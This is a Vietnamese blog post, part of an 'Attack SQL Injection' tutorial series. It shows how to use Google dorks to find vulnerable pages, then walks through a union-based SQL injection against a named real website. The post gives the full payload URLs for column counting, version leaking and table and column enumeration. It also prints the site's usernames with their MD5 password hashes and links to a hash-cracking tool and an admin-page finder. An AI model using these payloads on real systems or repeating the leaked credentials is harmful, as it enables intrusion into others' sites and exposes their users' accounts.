Friday 19 February 2016

Attack SQL Injection part 3


Ở phần 3 này mình sẽ hướng dẫn khai thác lỗi SQL Injection cơ bản.Sử dụng Google dork

I-Sử dụng Dork trong SQL Injection 

    Cú pháp "inurl:."domain"/"dorks
"inurl" =  nhập đường dẫn URL
"domain" =  nhập tên miền như .com, .gov...
"dorks" = dork có tham số truyền vào như gallery?id= , index.php?id= ....

Ví dụ: "inurl:.gov/index.php?id="
inurl có thể thay bằng các dork khác như
    intitle:
    intext:
    define:
    site:
    info:
    link:
Ví dụ: "intext:.edu/gallery?id="
1 số dork mình tổng hợp file .txt
https://drive.google.com/file/d/0B7YFc10EXAsVQWJfcG9FQkVkLVU/view?usp=sharing

    Gõ vào thanh tìm kiếm   "inurl:index.php?id=

II- Khai thác lỗi SQL Injection:

Tải công cụ addon trên Firefox hackbar 
Search: hackbar


Thêm dấu để check xem site có bị lỗi SQL Injection không ? Nếu giao diện hay title site đó thay đổi thì khoảng 70->80% site đó bị lỗi.


-->Lỗi rồi: You have an error in your SQL syntax
Chúng ta sẽ ORDER BY để xác định số cột của database của website

http://www.noor-arfa.com/products.php?catid=8 order by 100-- - 
--> Không hiện lỗi. Thử thêm dấu - hoặc ' (catid=-8, catid=8', catid=-8') 
http://www.noor-arfa.com/products.php?catid=8' order by 100-- - 
--> Database query failed: Unknown column '100' in 'order clause'

Mình thường query order by 100 để xem trang có thay đổi gì không ? Ok vậy số cột chắc chắn <100. Thử order by từ 10 trở đi.
CommentName
--:MySQL Linux Style
--+:MySQL Windows Style
#:Hash (URL encode while use)
--+-:SQL Comment
;:Null Byte
`:Backtick
http://www.noor-arfa.com/products.php?catid=8' order by 10-- -  

http://www.noor-arfa.com/products.php?catid=8' order by 14-- -
--> Database query failed: Unknown column '14' in 'order clause'
--> Có 13 cột 

http://www.noor-arfa.com/products.php?catid=8' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- -
--> Không hiện lỗi.Thêm dấu

http://www.noor-arfa.com/products.php?catid=-8' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- -

http://www.noor-arfa.com/products.php?catid=-8' UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13-- -
--> version 5.5.48-cll

+ Khai thác Table_name:
http://www.noor-arfa.com/products.php?catid=-8' UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()-- -

-->  countries,menu,menu_group,na_users,order_detail,orders,post,product_categories,products,products_bk,sliders,users,wnv_post


Thử khai thác các table_name users, na_users.
+ Khai thác Column trong table_name na_users . Chúng ta sẽ chuyển mã hex table này 
   na_users = 6e615f7573657273 


http://www.noor-arfa.com/products.php?catid=-8' UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=0x6e615f7573657273-- - 

--> id,username,password,name,address1,address2,zip,state,city,country,dob,phone,fax,email,signupdate,lastlogin,status,signupIP


+ Khai thác data

http://www.noor-arfa.com/products.php?catid=-8' UNION SELECT 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 from na_users-- -


aris85:3f7caa3d471688b704b73e9a77b1107f,salharina:b2805c093f83761e5aba2a145067ddc7,MarcelleSO:b2805c093f83761e5aba2a145067ddc7,diyah2842:8e721d1c51f5109c989c77d9275fcf61,Nur:b2805c093f83761e5aba2a145067ddc7,Chua:b2805c093f83761e5aba2a145067ddc7,aida:b2805c093f83761e5aba2a145067ddc7,sk:b2805c093f83761e5aba2a145067ddc7,eleonora:b2805c093f83761e5aba2a145067ddc7,samfazba:b2805c093f83761e5aba2a145067ddc7,zeydazeynal:b2805c093f83761e5aba2a145067ddc7,leenmz:b2805c093f83761e5aba2a145067ddc7
User: aris85

Password:3f7caa3d471688b704b73e9a77b1107f
Ở đây password được mã hóa MD5. Các bạn có thể sử dụng tool để có thể biết password dạng gì.

http://gh0stsec.blogspot.com/2016/02/zer0freaks-hash-identifier.html

Chúng ta tiến hành tìm link admin các bạn có thể tham khảo tool web admin finder
Link download:
https://drive.google.com/file/d/0B7YFc10EXAsVakZwdld0ZkdRM3M/view?usp=sharing

Trong phần tiếp theo mình sẽ nói về String based SQL Injection 

0 comments:

Post a Comment